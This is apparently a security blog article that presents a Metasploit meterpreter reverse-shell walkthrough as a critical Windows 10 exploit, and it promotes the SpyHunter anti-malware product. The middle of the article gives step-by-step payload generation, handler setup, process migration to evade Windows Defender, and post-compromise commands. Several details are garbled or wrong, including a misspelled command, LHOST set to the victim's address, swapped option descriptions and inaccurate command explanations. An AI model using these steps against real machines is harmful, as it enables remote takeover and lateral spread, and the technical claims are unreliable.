Hey you,

35,000 ransomware infections per month and you still believe you are protected?

Sign up to receive:

  • alerts
  • news
  • free how-to-remove guides

of the newest online threats - directly to your inbox:

Critical Windows 10 Vulnerability – Multihandler Exploit

Short DescriptionRead and write permissions in Windows 10. Allows the attacker to infect other PC connected to the infected one.
SymptomsAppearing of an unfamiliar .exe file.
Distribution MethodSpam mails. MiTM attacks, malicious redirects.
Detection toolDownload SpyHunter, to See If Your System Has Been Affected By Trojan:Win32/Swrort

p15_0000A dangerous exploit has been discovered in Windows 10, using a Trojan:Win32/Swrort to bypass Windows Defender and gain read and write permissions. Anonymous researcher has demonstrated the vulnerability from a channel, called Metasploitstation. He shows 3 phases in which you can slip past Windows 10 defenses. There was no information discovered so far on whether this exploit has been fixed or no.

Windows 10 Multihandler Exploit Infection – How To Do It?

In the video, the tech-savvy user demonstrated a simulation of a ‘123.exe’ file which he creates and executes as if it was opened in the real world as an attachment to an email or executed by another method. We have decided to divide the infection process into three phases to help you better understand the methodology.

Phase 1: File Preparation

The hacker creates a payload with this configuration in a Linux environment:

msfpaayload windows/meterpreter/reverse_tcp LHOST= LPORT= x> /home/awer/New\ folder/123.exe

portnumber1* – This is the port used for the attack. It can be any port (4444, 4324, etc.). We have written portnumber1 since he uses a second portnumber that we named afterward.

After this phase is complete and the file is created by the attacker and dropped onto the user system, the attacker may proceed to Phase 2.

Phase 2: Using the exploit.

At this point, the attacker uses multihandler to make it view the .exe and take advantage of the exploit to open an active session(connect) to the victim PC.

This can happen using the current command lines:

msfconsole (To start the console. Opens up ‘msf>’ interface)

In ‘msf’ the attacker can execute the following commands:

msf>use exploit/multi/handler
set lhost ‘victim IP address’
set lport ‘portnumber1’

After that, the attacker executes the payload to establish a session:

msfexploit(handler)>set payload windows/meterpreter/reverse_tcp

To check if an active session is possible, the attacker writes the command msfexploit(handler)>show options which enable him to see this

→EXITFUNC process yes Exit technique(accepted: seh, thread..)
LHOST victim IP address yes The listen port
LPORT portnumber1 yes The listen address

This allows him to see that he configured the settings correctly and may proceed with the actual infection of the computer.

Phase 3: Infection

The command that the attacker uses to initiate an active session with the victim is ‘exploit’. After executing this command, the file ‘123.exe’ returned with this reply:

[*] Started reverse handler on
[*] Starting the payload handler…

At this point, the executable was started on the Windows machine. Despite the fact that Windows Defender software was running, it did not stop the attack. However when scanned for viruses, the Windows antivirus program immediately detected ‘123.exe’ as a Trojan:Win32/Swrort.A.

To avoid detection, the attacker used a tactic, called migrating which created a ‘notepad.exe’ file that migrates the active session from ‘123.exe’ to this file upon connecting. This was done using the command:

meterpreter>run post/windows/manage/migrate

After migrating the process and repeating the same simulation but using (different port), the attacker was in again. This time when the attacker got in the PC he wasn’t detected even after Windows Defender did a scan and the ‘123.exe’ file was still present on the computer.

From there, the attacker demonstrated full read and wrote permissions by creating a new folder with a new text document. As far as we know the main commands that may be used after connection are:

>sysinfo – to show the system version and information.
>dir :/ – to open any target directory.
>shell – to show the Windows version and other information.
>getwid – shows Windows ID.
>ps –aux – displays all .exe files running in the Windows Task Manager.
>ifconfig – displays information about interfaces (IP addresses and other information). This command gives the attacker the information to connect to another computer that is in the same NIC and VLAN with the infected PC. This can be very devastating for home or office networks in case such attack is well organized.

Windows 10 Exploits – Conclusion

There is no actual information on whether or not this exploit has been fixed but like with any other software, there may be more uncovered ones. This is why in case you are using Windows 10, we recommend to download and install advanced malware protection program. It will actively protect you and update itself regularly with the latest threats. Also, such program has active shields that immediately detect any unauthorized connections.

Spy Hunter scanner will only detect the threat. If you want the threat to be automatically removed, you need to purchase the full version of the anti-malware tool.Find Out More About SpyHunter Anti-Malware Tool / How to Uninstall SpyHunter

Berta Bilbao

Berta is the Editor-in-Chief of SensorsTechForum. She is a dedicated malware researcher, dreaming for a more secure cyber space.

More Posts - Website

Share on Facebook Share
Share on Twitter Tweet
Share on Google Plus Share
Share on Linkedin Share
Share on Digg Share
Share on Reddit Share
Share on Stumbleupon Share
Please wait...

Subscribe to our newsletter

Want to be notified when our article is published? Enter your email address and name below to be the first to know.